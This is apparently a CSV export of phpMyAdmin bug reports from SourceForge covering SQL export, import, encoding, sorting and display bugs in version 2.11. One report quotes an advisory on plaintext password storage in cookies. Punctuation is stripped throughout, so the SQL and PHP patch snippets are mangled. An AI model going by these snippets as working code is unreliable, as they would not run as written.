How to reproduce CREATE TABLE IF NOT EXISTS `test` `a` int 4) NOT NULL COMMENT annee , `b` varchar 6) NOT NULL COMMENT lieu ) ENGINE=MyISAM DEFAULT CHARSET=latin1; This first query export OK SELECT a , count ) FROM `test` GROUP BY a This one not SELECT a , count ) FROM `test` GROUP BY a limit 0,30 Strange isn t it?
It seems that only queries with COUNT ) AND LIMIT have problem!
Thank you very much for your GREAT work.
Regards, Franxc3xa7ois Original URL https sourceforge.net p phpmyadmin bugs 2626 https sourceforge.net p phpmyadmin bugs 2626 Original author kalispera","bug"
"24444","8991","bug in sql.php on line 170.
Hello, They are warning about variable not define on line 170 into libraries import sql.php Code if first sql delimiter lt; pos) \{ found delimiter = false; \} Patch if !isset first sql delimiter) ) \{ first sql delimiter = ; \} if first sql delimiter lt; pos) \{ found delimiter = false; \} Original URL https sourceforge.net p phpmyadmin bugs 2627 https sourceforge.net p phpmyadmin bugs 2627 Original author bertrand r Found in version 2.11.4","bug"
"24444","8992","Unable to connect to mysql server that requires a specificdb.
Hello, Im trying to connect to a mysql database on the megasqlservers.com which is a telus hosted mysql server) they require that you connect to a specific db so show databases will error out on sql command as you dont have access to that, but if you run select from db.tablename works fine but I cant go upto the database level to view all the tables or even click on structure doesnt respond.
Original URL https sourceforge.net p phpmyadmin bugs 2628 https sourceforge.net p phpmyadmin bugs 2628 Original author crash1hd Found in version 2.11.4","bug"
"24444","8993","Export bad column name.
CREATE TABLE `dual` `kod okresu` varchar 6) NOT NULL, `nazev okresu` varchar 120) NOT NULL, `kod kraje` varchar 5) NOT NULL, `platnost od` year 4) NOT NULL, `platnost do` year 4) NOT NULL, PRIMARY KEY `kod okresu`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SELECT vusc AS kod okresu, misto AS nazev okresu, CZ010 AS kod kraje, rok maturity AS platnost od, rok maturity 1 AS platnost do FROM `dual` WHERE ...
Displayed query results are fine column name OK. Use Export button in Query results operations export to SQL option and results are INSERT INTO `dual` `kod okresu`, `misto`, `CZ010`, `rok maturity`, `rok maturity`) VALUES CZ0111 , Praha 1 , CZ010 , 1999, 2000), Original URL https sourceforge.net p phpmyadmin bugs 2629 https sourceforge.net p phpmyadmin bugs 2629 Original author iprajer Found in version 2.9.1.1","bug"
"24444","8994","Mysql Server and Client version mismatch.
A warning is displayed about the version of the client not matching the server version yet php mysql get client info ) and mysql get server info ) both return the same correct version.
Original URL https sourceforge.net p phpmyadmin bugs 2630 https sourceforge.net p phpmyadmin bugs 2630 Original author kangus Found in version 2.11.4","bug"
"24444","8995","auth signon not working.
Setup mysqli mysql 5.0.32 7etch1 php 5.2.0 8 etch7 apache 2.2.3 4 etch1 running the phpMyAdmin in SSL.
config cfg[ Servers ][ i][ auth type ] = signon ; cfg[ Servers ][ i][ SignonSession ] = x1y ; cfg[ Servers ][ i][ SignonURL ] = https www.xy.com phpMyAdmin scripts signon.php ; Starting with the form only changed the session name but doesnt work with the default ether) https www.xy.com phpMyAdmin scripts signon.php After Submit it comes back with the form in this way https www.xy.com phpMyAdmin scripts signon.php?phpMyAdmin=EDgDdl2dGyLh7KBFTC1ao3iwxJ9 It seems, that the libraries auth signon.auth.lib.php does not get the COOKIE Variable.
But I can t find the place where it s altered.
If I put a Script with die print r COOKIE); in the same directory it will deliver the actual Cookiename.
kind regards klaus Original URL https sourceforge.net p phpmyadmin bugs 2631 https sourceforge.net p phpmyadmin bugs 2631 Original author themac Found in version 2.11.4","bug"
"24444","8996","Edit next row not working in 2.11.4 Suhosin).
Same error which has crept into previous versions is back.
Choosing Save and Edit Next Row options when editing a record don t open the next row for editing, it returns you back to the previous page.
Original URL https sourceforge.net p phpmyadmin bugs 2632 https sourceforge.net p phpmyadmin bugs 2632 Original author adrianbj","bug"
"24444","8997","Please ignore same bug as RequestID 1863326.
In 2.11.4 If you have done a search to select a set of rows and then click on the edit icon to edit it, it returns you to a browse view showing all records this is a particularly frustrating bug ) Original URL https sourceforge.net p phpmyadmin bugs 2633 https sourceforge.net p phpmyadmin bugs 2633 Original author adrianbj","bug"
"24444","8998","partial import doesn t work in 2.11.4. there s no data import bug category?)
I was using phpMyAdmin 2.11.0, when I upgraded to the current version 2.11.4), keeping config files and all, the Partial Import feature suddenly stopped working phpMyAdmin was the only thing changed) giving me a max execution time limit reached error.
tested with different files different sizes, didn t work.
software I m using PHP 5.2.4 MySQL 5.0.45 WAMP5 1.7.3 Original URL https sourceforge.net p phpmyadmin bugs 2634 https sourceforge.net p phpmyadmin bugs 2634 Original author bug me not Found in version 2.11.4","bug"
"24444","8999","Error Parsing a Semicolon.
Hi, When I have a query that has a semicolon UPDATE tmbs showcase SET image = http www.smickus.org tmbs img showcase 0.jpg; http www.smickus.org tmbs img showcase 1.jpg; http www.smickus.org tmbs img showcase 2.jpg; http www.smickus.org tmbs img showcase 3.jpg It removed the end speech mark making the query invalid).
This query ran fine when not sent using PHPMyAdmin to run the query.
I assume it has something to do with the semicolon being used as an end of query marker to being a new query?
Thought I d report it anyway ) Original URL https sourceforge.net p phpmyadmin bugs 2635 https sourceforge.net p phpmyadmin bugs 2635 Original author smickus Found in version 2.11.0","bug"
"24444","9000","php warning when executing an sql statement.
Notice Undefined variable first sql delimiter in opt lampp htdocs admin phpMyAdmin libraries import sql.php on line 170 when trying toexecute the following sql statement ALTER TABLE `xx mitarbeiter` ADD `telefon` VARCHAR 30 ) NOT NULL , ADD `fax` VARCHAR 30 ) NOT NULL , ADD `position` VARCHAR 60 ) NOT NULL ; ALTER TABLE `xx mitarbeiter` ADD `is ansprechpartner` TINYINT 1 ) NOT NULL , ADD `is zeichnungsberechtigt` TINYINT 1 ) NOT NULL ; ALTER TABLE `xx mitarbeiter` ADD `titel` VARCHAR 30 ) NOT NULL AFTER `anrede id` ; Original URL https sourceforge.net p phpmyadmin bugs 2636 https sourceforge.net p phpmyadmin bugs 2636 Original author stekil Found in version 2.11.4","bug"
"24444","9001","Space usage.
Hello, The space usage is a little confusing... 1\.
This one looks good Type Usage Data 13,516 KiB Index 2,678 KiB Total 16,194 KiB 2\.
This one is a little confusing.
Shouldn t it switch from KiB to MiB and so forth Type Usage Data 118 k KiB Index 468 k KiB Total 586 k KiB Original URL https sourceforge.net p phpmyadmin bugs 2637 https sourceforge.net p phpmyadmin bugs 2637 Original author warforge00 Found in version 2.11.4","bug"
"24444","9002","Order columns in result list messing up query.
PHP 5.2.5 MySQL 5.0.45 community nt Apache 2.2.6 Win32 PMA moves the LIMIT clause before the ORDER BY clause with a query that contains a WHERE clause inside parenthesis ... To replicate Click the SQL tab, and put in a query with a specified LIMIT clause SELECT FROM `tbl` WHERE `tbl`.`something`=2) ORDER BY `column` ASC LIMIT 0,20 Run this query, then click the column header in the result list to return the result DESC.
Click it yet again to sort ASC and PMA will restructure the query like so SELECT FROM `tbl` WHERE `tbl`.`something`=2) LIMIT 0,20 ORDER BY `column` ASC It does not do this when PMA puts in it s own LIMIT clause [or, when the user omits the LIMIT clause from their query] Original URL https sourceforge.net p phpmyadmin bugs 2638 https sourceforge.net p phpmyadmin bugs 2638 Original author pureform Found in version 2.11.4","bug"
"24444","9003","Very Slow Import browser refresh on Safari.
I am on OS X 10.5 and I was having an issue with importing a phpmyadmin export.
the browser would be very slow to refresh and sometimes not till i clicked the go button on the import page a couple times.
I tested with an older phpmyadmin version 2.8 and this was not an issue.
the import happened quickly and the browser refreshed.
the sql file size is about 215kb.
Original URL https sourceforge.net p phpmyadmin bugs 2639 https sourceforge.net p phpmyadmin bugs 2639 Original author wgrzybowski Found in version 2.11.4","bug"
"24444","9004","Inconsistent behavior when reporting executed queries.
PMA prints at most situations the query it used for given operation.
That s perfect.
When you insert or update row, or when you re messing around with innodb foreign keys ALTER TABLE ... query), PMA allways prints used query with a semicolon at the end.
On the other side, when you select data or alter table structure, PMA prints used query without that semicolon.
The point is, that I sometimes do changes at two mostly identical databases.
When I do some changes in the first DB, I often cut paste used gueries to some text editor and when I m done with the first DB, I just paste all queries in to the query field in the second database.
Then often some errors occur, because sometimes the semicolon is missing because I didn t pay attention whether PMA did or didnt add the semicolon.
I think, that this should be changed in one way or another either exclude the semicolon from every query report, or make it appear everywhere.
Would it be possible?
Original URL https sourceforge.net p phpmyadmin bugs 2640 https sourceforge.net p phpmyadmin bugs 2640 Original author pogik Found in version Latest Git","bug"
"24444","9005","SET NAMES for importing with command line client.
I have a table with some strings in Hebrew.
if I export it using PHPMyAdmin and import it back, all the Hebrew strings gets borked.
if I export it using mysqldump and import it back nothing bad happens.
I am attaching the export file from PHPMyAdmin and of MySQL dump.
Original URL https sourceforge.net p phpmyadmin bugs 2641 https sourceforge.net p phpmyadmin bugs 2641 Original author omry y","bug"
"24444","9006","Function PMA DBI get tables full does not show all tables.
Hi !
I already asked in german forum but it seems nobody has similar problems.
Since PMA 2.10 i encountered problems displaying my databases they seems to be missing at all; only a few are displayed.
So i commented out in database interface.lib.php function PMA DBI get tables full line 233 to 297 if PMA MYSQL INT VERSION gt;= 50002) \{ ... \} This helps displaying my databases.
I use MySQL 5.1.22 on W32.
Original URL https sourceforge.net p phpmyadmin bugs 2642 https sourceforge.net p phpmyadmin bugs 2642 Original author petesky Found in version 2.11.4","bug"
"24444","9007","text plain dateformat missinterpreting.
The PMA transformation text plain dateformat didn t interprete some unix time stamps correct.
e.g.
the timestamp 1202137415 will be shown as 16 12 2012 02 15 but should be 04 02 2008 16 08 The problem may be in the line 37 if preg match \d\{2\})\{3,7\} , buffer)) \{ but i didn t got a solution ; Original URL https sourceforge.net p phpmyadmin bugs 2645 https sourceforge.net p phpmyadmin bugs 2645 Original author isymed Found in version 2.11.4","bug"
"24444","9008","max file size wrong ?.
Hi guys, thanks for this great software.
Recently i bought a new pc so i installed Apache 2.2.8 and latest php 5.2.5 as module).
All this under unfortunately ) windows vista home basic.
I had this issue though .
I have changed the upload max filesize to 16M but phpMyAdmin interface still shows 2M when i open the upload file window.
phpinfo shows 16M correctly and i have uploaded a file greater than 2M with no problem.... Any thoughts ?
Thanks Leon Original URL https sourceforge.net p phpmyadmin bugs 2646 https sourceforge.net p phpmyadmin bugs 2646 Original author sygram Found in version 2.11.4","bug"
"24444","9009","Sort Data on a Field name with space.
Hello, i created a view and some field names contain spaces.
If I click on the column heading to sort the data in the view, i get an sql error.
e.g.
Link in 2.11.5 rc1 http domain.de sql.php?db=db table=table token=fbdsf48be046cf5c5sd6176sdb sql query=SELECT 2A FROM 60table 60 ORDER BY 60table 60.
60fieldname 60 ASC Link in 2.11.4 http domain.de sql.php?db=db table=table token=453a45bs458fcvbb7a98ee224s sql query=SELECT 2AFROM 60table 60 ORDER BY 60table 60.
60field name 60 ASC In case of privacy I changed some values in the url.
The difference is the in field name and fieldname.
Original URL https sourceforge.net p phpmyadmin bugs 2643 https sourceforge.net p phpmyadmin bugs 2643 Original author jacky php Found in version 2.11.5","bug"
"24444","9010","Arctic ocean theme undefined variable type .
This is what I wrote in the Help forum and got directed here by lem9.
I have just set my laptop to Apache 2.0.63, MySql 5.0.51a and Php 5.2.5.
In this version the Artic Ocean Theme does not behave properly in what refers to spacing at the top of the screen, where the options are displayed.
It s height is not normal and for example if you select Sql then the begining of the section is hidden by the menu tabs.
Worst of all I just tried the demos page and if you select Artic Ocean with version 3, then you will not be able to change the theme or anithing related because the displaying of the options tabs) instead of been horizontal are displayed vertically.
Maybe this should be logged as a bug but as you sometimes) are so touchy I prefered to log it here just in case.
How to replicate, just go to http pma.cihar.com trunk index.php?
and select ArticOcean or install what i Installed I don t know with other versions) and give it a try.
I m using Mozilla Firefoz version 2.0.0.12 in both computers.
The Version in both cases) is phpMyAdmin 2.11.4 I will be uploading 7 images in sequence.
Index Screen in Normal version php 4 Index Screen in Error version php 5 Sql Screen in Normal version php 4 Sql Screen in Error version php 5 Structure Screen in Normal version php 4 Structure Screen in Error version php 5 The last one is just to show you how does Artic Ocean behave if using PMA Version 3 I know itxc2xb4s still in development) just for you to know, by the way this screenshot was with php 2 I don t know how does it behave in php 5.
Original URL https sourceforge.net p phpmyadmin bugs 2644 https sourceforge.net p phpmyadmin bugs 2644 Original author yacar suscri","bug"
"24444","9011","Display very large Queries.
I just imported some data from a SQL Dump GZip compressed) which included some CREATE TABLE s and many INSERTs.
Almost the complete dump was executed when this error occured 1153 Got a packet bigger than max allowed packet bytes Ok, one of the INSERTs was too big, no problem.
But phpMyAdmin displayed this insert and that was a problem for my browser.
I think it s not very clever to display a command which is too big for the database.
I added a screenshot.
My suggestion is not to display the SQL when MySQL Error 1153 occurs.
Original URL https sourceforge.net p phpmyadmin bugs 2647 https sourceforge.net p phpmyadmin bugs 2647 Original author dadyne Found in version 2.11.1.2","bug"
"24444","9012","Deprecated is a ) and get magic quotes gpc ).
Hello, I tried phpMyAdmin 2.11.5 with snapshot of PHP 5.3.0 dev Sat, 01 Mar 2008 08 22 44 0500).
It won t work and produces the following errors Deprecated get magic quotes gpc ) [function.get magic quotes gpc] This function is deprecated and removed in PHP 6.
See http php.net \{migrate\} get magic quotes gpc for details.
in phpmyadmin\libraries\common.inc.php on line 225 Deprecated is a ) Deprecated.
Please use the instanceof operator in phpmyadmin\libraries\dbi\mysqli.dbi.lib.php on line 337 [multiple times] I ve changed sources by this way to solve the problem common.inc.php , Line 225 if function exists get magic quotes gpc ) get magic quotes gpc )) \{ Replacement for function in file mysqli.dbi.lib.php function PMA DBI free result ) \{ foreach func get args ) as result) \{ if is object result) get class result) == strtolower mysqli result ) or is subclass of result, mysqli result )) ) \{ mysqli free result result); \} \} \} Hope that helps.
Original URL https sourceforge.net p phpmyadmin bugs 2648 https sourceforge.net p phpmyadmin bugs 2648 Original author yrtimd Found in version 2.11.5","bug"
"24444","9013","Problem with reserved word HOSTS.
select from hosts as h where h.hostid=10012 this works and return a result, but select from hosts h where h.hostid=10012 does not return anything.
with the second syntax, pma is sending a correct query to mysqld select SQL CALC FOUND ROWS from hosts h where h.hostid =10012 LIMIT 1; tested with mysql 5.0.32, pma 2.11.5 2.11.4) Original URL https sourceforge.net p phpmyadmin bugs 2649 https sourceforge.net p phpmyadmin bugs 2649 Original author lordgun Found in version 2.11.5","bug"
"24444","9014","Import of VIEWs fails if tempTable exists.
If You export a view with 2.11.5 and you wish to import it in the same Database at a other machine, the creation of the placeholder table fails, because they exists in an older version, also if you have choosen drop table at the export.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 2650 https sourceforge.net p phpmyadmin bugs 2650 Original author klaf Found in version 2.11.5","bug"
"24444","9015","Sensitive data in session files.
Support, How do I prevent phpMyAdmin 2.10.1 from saving the MySQL Root Password as Plain Text in the current tmp Session file?
I have auth method cookie.
I don t store my password in the config file.
I searched the Help forum and the internet.
It appears that the problem was identified back in 2003 with version 2.5 and earlier.
I could not find the fix listed anywhere.
I would upgrade if a newer version corrects this problem.
Jim Reference http www.net security.org vuln.php?id=2765 From Lorenzo Manuel Hernandez Garcia Hierro lt;security lorenzohgh.com gt; SECURITY HOLES FOUND and PROOFS OF CONCEPT ....
I discover that phpMyAdmin don t encode the mysql user and password , it save the data in plain text without encoding !....
| INFORMATION | | ENCODING | | WEAKNESS | phpMyAdmin doesn t use any encoding type like BASE64 RadiX64 , only saves the user data username and password too ) in plain text without any encoding.
The authentication token in the cookie is this pma cookie username=[UserName]; lang=[language] iso 8859 1; pma cookie password=[your password] A sample is pma cookie username=god; lang=en iso 8859 1; pma cookie password=doesnotexist | SOLUTIONS ; p | Second Use a partial secure encoding for athentication tokens like RadiX64 not very secure but an attacker can think that is a more secure algorithm , obscurity ; D ) .
Original URL https sourceforge.net p phpmyadmin bugs 2653 https sourceforge.net p phpmyadmin bugs 2653 Original author jimhermann","bug"
"24444","9016","Reimport of Function fails.
If You export a function, there was not created a DROP FUNCTION Statement also if checked DROP TABLE VIEW at the export.
The problem occurs on reimport at the same Database at an different machine with older versions of the function.
Yes the simple work around is at first delete the old database, but I think, if I choose DROP TABLE VIEW i would be able to reimport the exportet structure.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 2651 https sourceforge.net p phpmyadmin bugs 2651 Original author klaf Found in version 2.11.5","bug"
"24444","9017","new field cannot be autoincrement and PK.
In a table with various fields, if you can insert a new one, type int, you cannot select auto increment and primary key button at the same time You get an error SQL query ALTER TABLE `Jefes` ADD `numID` INT 5 ) NOT NULL AUTO INCREMENT FIRST MySQL said Documentation 1075 Incorrect table definition; there can be only one auto column and it must be defined as a key This happen with phpmyadmin 2.11.3, 2.11.4 and 2.11.5, but not with 2.11.2 I am using firefox 2.0.0.12, mysql 5.0.45, an MacOSX 10.4.11 Original URL https sourceforge.net p phpmyadmin bugs 2652 https sourceforge.net p phpmyadmin bugs 2652 Original author pikorzo Found in version 2.11.5","bug"
"24444","9018","unsetting the whitelist during the loop.
Dear developers, When trying to install the new 2.11.5 release, I ran into problems with phpMyAdmin displaying only blank pages.
After some research, I traced the problem to libraries common.inc.php 148 170.
It seems that get defined vars ) also returns the local variables key, value and variables whitelist.
These variables themselves are not in the whitelist, and consequently get unset.
This seems to cause the script to never terminate.
I made a make shift fix for own use by simply adding these three variable names to the variables whitelist.
Now my phpMyAdmin install is finally) working!
In case it is of value, I included the output of phpinfo ) on my server.
Regards, Jeroen Vrijkorte Original URL https sourceforge.net p phpmyadmin bugs 2654 https sourceforge.net p phpmyadmin bugs 2654 Original author jv map Found in version 2.11.5","bug"
"24444","9019","BINARY displayed as a text.
I have BINARY 16) column in my table, but it s a surprise to me that phpMA tries to display it s contents as a text so I m getting some unreadable garbage.
I would be more useful if phpMA could display mainly textual bin i.e.
utf8 bin) columns as a text not [BLOB bytes] .
Original URL https sourceforge.net p phpmyadmin bugs 2655 https sourceforge.net p phpmyadmin bugs 2655 Original author luxintenebris Found in version 2.11.4","bug"
"24444","9020","ForceSSL generates incorrect redirections.
When ForceSSL is turned on, a URL like http server phpMyAdmin is redirected to https server phpMyAdmin ?collation connection=utf8 unicode ci amp;amp;token=...
This is incorrect the URL should contain and not amp;amp;.
The amp;amp; encoding is only used for embedding the URL into an HTML document.
It should never be treated as part of the URL itself.
The amp;amp; should be generated with htmlspecialchars ) at the time that a tag like lt;a href= ... gt; is generated.
Original URL https sourceforge.net p phpmyadmin bugs 2656 https sourceforge.net p phpmyadmin bugs 2656 Original author anders1 Found in version 3.0.0","bug"
"24444","9021","Broken links to databases with in their name.
I have some databases with in their name.
If I click the Databases link from the phpMyAdmin main page, then click on one of these databases, I am redirected back to the main page instead of my database.
It appears that the is not getting properly encoded or decoded somewhere.
This bug only happens with JavaScript enabled.
Original URL https sourceforge.net p phpmyadmin bugs 2657 https sourceforge.net p phpmyadmin bugs 2657 Original author anders1 Found in version 2.11.5","bug"
"24444","9022","Database has more tables than that there are shown.
I have a database with multiple tables in it.
When I browse them with php written mysql code I can access them.
I can access them by using MySQL Query Browser from MySQL tools).
However not all the tables are showing up in phpMyAdmin.
On the left it says the correct amount of tables in the database.
After opening that database, it shows only 1 table s) available.
So, the left menu count is correct.
Displaying the tables is incorrect.
Note Browser independent.
Original URL https sourceforge.net p phpmyadmin bugs 2658 https sourceforge.net p phpmyadmin bugs 2658 Original author eturfboer Found in version 2.11.5","bug"
"24444","9023","Qualified Names in Export prevent import to other databases.
The title shows the problem.
It occurs espacially in FUNCTION PROCEDURE and VIEW exports.
If You have defined and tested some views on a test database and You wish to export these to reimport the views to your production database the full qualified names on export are not usefull, because you have to edit the export manually.
It is a philosophical question, if You always wish to have full qualified names.
A global rename replace is probably not the solution.
For a short work around on views, I find out, that the view definition is getted from a SHOW CREATE TABLE dbname.viewname statement in the PMA getTableDef ) function.
If You omit the dbname you get an not qualified result.
For table definitions I didn t see differences at the first view.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 2659 https sourceforge.net p phpmyadmin bugs 2659 Original author klaf Found in version 2.11.5","bug"
"24444","9024","Order By... click on table header doesn t work always.
phpMyAdmin 2.11.5 Windows 2000 PHP 5.2.1 Apache 2.0.47 MySQL 5.0.37 SQL SELECT something FROM table WHERE 1 You can order your resulttable by clicking on tableheader something , works fine SQL SELECT something FROM table WHERE 1 ORDER BY table.something Now SQL SELECT something AS foo FROM table WHERE 1 It should also be possible to order resulttable by clicking on tableheader foo , but 1054 Unknown column table.foo in order clause SQL SELECT something FROM table WHERE 1 ORDER BY table.foo Original URL https sourceforge.net p phpmyadmin bugs 2660 https sourceforge.net p phpmyadmin bugs 2660 Original author d mrowczynski","bug"
"24444","9025","Navigation isn t w3.org valid.
phpMyAdmin 2.11.5 Navigation isn t Valid XHTML 1.0 Transitional as it should be.
lt;body id= body leftFrame onload= PMA setFrameSize ); onresize= PMA saveFrameSize ); gt; There is no attribute onresize .
Original URL https sourceforge.net p phpmyadmin bugs 2661 https sourceforge.net p phpmyadmin bugs 2661 Original author d mrowczynski Found in version 2.11.5","bug"
"24444","9026","Renaming a Database fails to copy Functions.
I am running MySQL 5.0.48 with PHP 5.2.5 on Windows XP SP2 with the most recent patches using PHPMyAdmin 2.11.5.
Login as root to PHPMyAdmin Select a database that has user defined functions associated with it.
Click the Operations Tab.
Rename the database from cnagle braille to nercve braille.
Now examine the proc table in the mysql database the user defined functions associated with the cnagle braille database have disappeared and none exist for nercve braille.
Where d they go?
I would prefer not to disclose my database schema.
Here is the create statement for one of the functions that dissappears.
If you need more information please let me know, I will be happy to try and help.
CREATE DEFINER=`nercve` `localhost` FUNCTION `fInCourse` course INT 11), user INT 11)) RETURNS tinyint 1) READS SQL DATA DETERMINISTIC RETURN SELECT IFNULL SELECT 1 FROM Courses c WHERE c.id = course AND c.deleted = 0 AND c.Instructor = user OR user IN SELECT UserID FROM CourseUser WHERE CourseID = course) OR 1 = user)),0)) Original URL https sourceforge.net p phpmyadmin bugs 2662 https sourceforge.net p phpmyadmin bugs 2662 Original author lennynyktyk Found in version 2.11.5.1","bug"
"24444","9027","Data export with SSO want flush data to browser.
I expirience a strange bug that happens only with SSO auth method with cookie or config works) When i export a big db 100MB or so), not compressed, via db export page, the file came very very slowly to client ie, firefox, opera, every browser i had) and in the apache server cpu go at 100 php as a module in a centos 4 x86 64 but also i try in centos 5 32 or 64bit and many configuration combination also with apache and php 5 compiled, but is perfectly equal).
The db is the same many with the same result) and the only change is auth method.
I really don t know what is the problem but with strace seems not to write to the network only with SSO.
I try from 2.10.3 to 2.11.5 version and the problem is the same.
Original URL https sourceforge.net p phpmyadmin bugs 2663 https sourceforge.net p phpmyadmin bugs 2663 Original author mchiavac Found in version 2.11.5","bug"
"24444","9028","Error at login with mapped port.
The php mysql server is working ok in all of its parts.
php web in port 80, mysql in localhost.
I need to use port 8080 instead port 80, so the external router maps port 8080 to 80 in the server.
Hence, the access is http database.indomain.com 8080 of course, database points to phpMyAdmin an it works as it should.
Login screen appears Enter username password ok it takes, some time, then connection not established) but there appears in the browser url address bar http database.indomain.com index.php?lang=en utf 8 token=a324.....
So I have to insert in that url the port 8080 again http database.indomain.com 8080 index.php?lang=en utf 8 token=a324.....
Enter ... and its works from there auto using the port 8080 What is the bug?
May be there is not a avariable inside phpMyAdmin learning that the actual url has port 8080 at login when in fact there is variable to read that.
SERVER[ SERVER PORT ] Original URL https sourceforge.net p phpmyadmin bugs 2664 https sourceforge.net p phpmyadmin bugs 2664 Original author bitagenda","bug"
"24444","9029","bit 1) true values shown as x01.
Hi, I have a table with a column of type bit 1).
If I have a dataset with value 1 for that column it is not displayed as 1 in the Browse view but as x01 .
This is a bug because if I try to edit the dataset and it has no primary key) it will not be able to find the dataset as the query by phpmyadmin is also wrong WHERE column is x01 and not WHERE column is 1 Best Killerloop Original URL https sourceforge.net p phpmyadmin bugs 2665 https sourceforge.net p phpmyadmin bugs 2665 Original author killerloop2 Found in version 2.11.5","bug"
"24444","9030","Mediawiki Search.
if you try to search in the mediawiki, e.g.
http wiki.cihar.com pma Procedures, you ll get a database error.
Original URL https sourceforge.net p phpmyadmin bugs 2666 https sourceforge.net p phpmyadmin bugs 2666 Original author mibraun","bug"
"24444","9031","Input Fields haven t maxlength, typed txt could be too long.
When you ve got as example an varchar with a length of 35 characters, it s only possible to save 35 characters in this MySQL dataset.
OK, that s fine.
But When you take phpMyAdmin to insert a dataset the input fields haven t a maxlength, so you could type in more then as example) 35 characters and MySQL can t insert this dataset.
HTML shows something like this lt;input type= text name= fields[multi edit][0][Foo] value= size= 40 class= textfield onchange= return unNullify Foo , 0 ) tabindex= 4 id= field 2 3 gt; But it should be something like this as example with 35 a vartext of 35 characters) lt;input type= text name= fields[multi edit][0][Foo] value= size= 40 class= textfield onchange= return unNullify Foo , 0 ) tabindex= 4 id= field 2 3 maxlength= 35 gt; gt; phpMyAdmin should query MySQL for max.
sizes of each datafield and should insert a maxlength value in each input field to beware users of typing too much text or numbers or anything else) which can t be stored.
Original URL https sourceforge.net p phpmyadmin bugs 2668 https sourceforge.net p phpmyadmin bugs 2668 Original author d mrowczynski Found in version 2.11.5","bug"
"24444","9032","BIT defaults displayed incorrectly.
I have a table with a BIT 1) field and the default set as 1.
The phpmyadmin interface displayed the default as a square on Windows XP.
It looks like phpmyadmin is outputting the bit field as the ascii of the bit value rather than a string equivalent of the binary value.
It is happening on tbl structure.php, tbl structure.php and tbl export.php Example table is CREATE TABLE IF NOT EXISTS `bit` `bit 2` bit 2) NOT NULL default b 1 ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 general ci; Original URL https sourceforge.net p phpmyadmin bugs 2667 https sourceforge.net p phpmyadmin bugs 2667 Original author gabrielharrison Found in version 2.11.5.1","bug"
"24444","9033","Incorrect string value.
I m using, Windows XP SP2, Apache 2.2.8, Php 5.2.5, MySql Server version 5.0.45 community nt, client version 5.0.45 and PhpMyAdmin version 2.11.5.1 With the table bellow I have this error when doing an import INSERT INTO `BitacoraDetails` VALUES N , 136924 , 2004 07 19 , 1 , 1 , 1 , 2 , 1 , 1 , 1 , NULL , NULL , NULL , NULL , NULL , NULL , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , 0000 00 00 , 00 00 00 , 0 , 0000 00 00 , 0 , , NULL , NULL , NULL , 99999998 , , ALARMA EN S E BOYACA 230 KV.
FICHA PRESION ANORMAL xc2x9610 SF6 COMPARTIMIENTOS 1 K L M N Q) Y PRESION ANORMAL xc2x9650 SF6.
NO BORRA.
EN CTA.
SR. F. GALLARDO.
, NULL , NULL , NULL , 23 56 NT ALARMA EN S E BOYACA 230 KV.
FICHA PRESION ANORMAL xc2x9610 SF6 COMPARTIMIENTOS 1 K L M N Q) Y PRESION ANORMAL xc2x9650 SF6.
NO BORRA.
EN CTA.
SR. F. GALLARDO.
, 23 56 00 , NT Nota , 0000 00 00 , 00 00 00 , 0000 00 00 , 00 00 00 , 0 , 0 , 2008 02 22 14 13 28 ) MySQL said Documentation 1366 Incorrect string value \xC2\x9610 ... for column DetailDet at row 1 The original csv record is as follows N ; 136924 ; 2004 07 19 ; 1 ; 1 ; 1 ; 2 ; 1 ; 1 ; 1 ;NULL;NULL;NULL;NULL;NULL;NULL; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; 0000 00 00 ; 00 00 00 ; 0 ; 0000 00 00 ; 0 ; ;NULL;NULL;NULL; 99999998 ; ; ALARMA EN S E BOYACA 230 KV.
FICHA PRESION ANORMAL xe2x80x9310 SF6 COMPARTIMIENTOS 1 K L M N Q) Y PRESION ANORMAL xe2x80x9350 SF6.
NO BORRA.
EN CTA.
SR. F. GALLARDO.
;NULL;NULL;NULL; 23 56 NT ALARMA EN S E BOYACA 230 KV.
FICHA PRESION ANORMAL xe2x80x9310 SF6 COMPARTIMIENTOS 1 K L M N Q) Y PRESION ANORMAL xe2x80x9350 SF6.
NO BORRA.
EN CTA.
SR. F. GALLARDO.
; 23 56 00 ; NT Nota ; 0000 00 00 ; 00 00 00 ; 0000 00 00 ; 00 00 00 ; 0 ; 0 ; 2008 02 22 14 13 28 The original csv file is 67461KB in size and has 111301 records, from those, 47463 records were processed without problem.
Apart from the given error can you tell me where do the value \xC2\x9610 ) come from?, Why is this conversion taking place?, I m not using nothing special and the csv file was originally created by PMA version 2.11.5 in a server in which the customer is using mysql version 3.23.58 very old).
